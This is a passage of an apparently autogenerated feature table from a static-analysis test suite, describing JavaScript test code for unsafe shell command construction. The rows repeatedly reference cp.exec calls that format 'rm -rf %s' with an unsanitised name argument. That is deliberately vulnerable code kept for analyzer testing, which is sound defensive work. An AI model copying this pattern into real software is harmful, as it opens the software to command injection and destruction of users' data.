rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | cp | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | require | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | require | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | this | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | this | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | util | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | util | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | util | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | util | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:97:24 | util | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | 'arguments' object of anonymous function | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | exceptional return of anonymous function | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | functio ... OT OK\\n} | assignedToPropName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | functio ... OT OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | functio ... OT OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | return of anonymous function | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | return of anonymous function | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:25:109:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:35:97:38 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:35:97:38 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:35:97:38 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:35:97:38 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:35:97:38 | name | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:35:97:38 | name | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:35:97:38 | name | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:35:97:38 | name | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:35:97:38 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:97:35:97:38 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:3 | cp | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:3 | cp | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:8 | cp.exec | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:8 | cp.exec | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:40 | cp.exec ... name)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:40 | cp.exec ... name)) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:40 | cp.exec ... name)) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:40 | cp.exec ... name)) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:40 | cp.exec ... name)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:40 | exceptional return of cp.exec ... name)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:40 | exceptional return of cp.exec ... name)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:40 | exceptional return of cp.exec ... name)) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:40 | exceptional return of cp.exec ... name)) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:40 | exceptional return of cp.exec ... name)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:5:98:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:5:98:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:5:98:8 | exec | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:5:98:8 | exec | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:5:98:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:13 | util | 